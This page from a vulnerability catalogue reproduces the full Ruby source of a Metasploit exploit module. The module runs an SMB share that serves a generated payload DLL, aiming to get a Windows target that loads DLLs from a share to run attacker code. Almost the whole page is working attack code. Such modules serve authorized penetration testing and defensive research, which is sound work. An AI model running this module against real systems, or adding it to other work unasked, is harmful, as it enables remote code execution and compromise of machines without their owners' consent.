Generic DLL Injection From Shared Resource

2015-03-04T22:38:08
ID MSF:EXPLOIT/WINDOWS/SMB/GENERIC_SMB_DLL_INJECTION
Type metasploit
Reporter Rapid7
Modified 2017-09-17T20:00:04

Description

This is a general-purpose module for exploiting conditions where a DLL can be loaded from a specified SMB share. This module serves payloads as DLLs over an SMB service.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Generic DLL Injection From Shared Resource',
      'Description'   => %q{
        This is a general-purpose module for exploiting conditions where a DLL can be loaded
        from a specified SMB share. This module serves payloads as DLLs over an SMB service.
      },
      'Author'      =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'References'     =>
        [
          ['CWE', '114']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => false,
      'Platform'       => 'win',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 04 2015'
    ))

    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)'])
      ])

    deregister_options('FILE_CONTENTS')
  end

  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end
end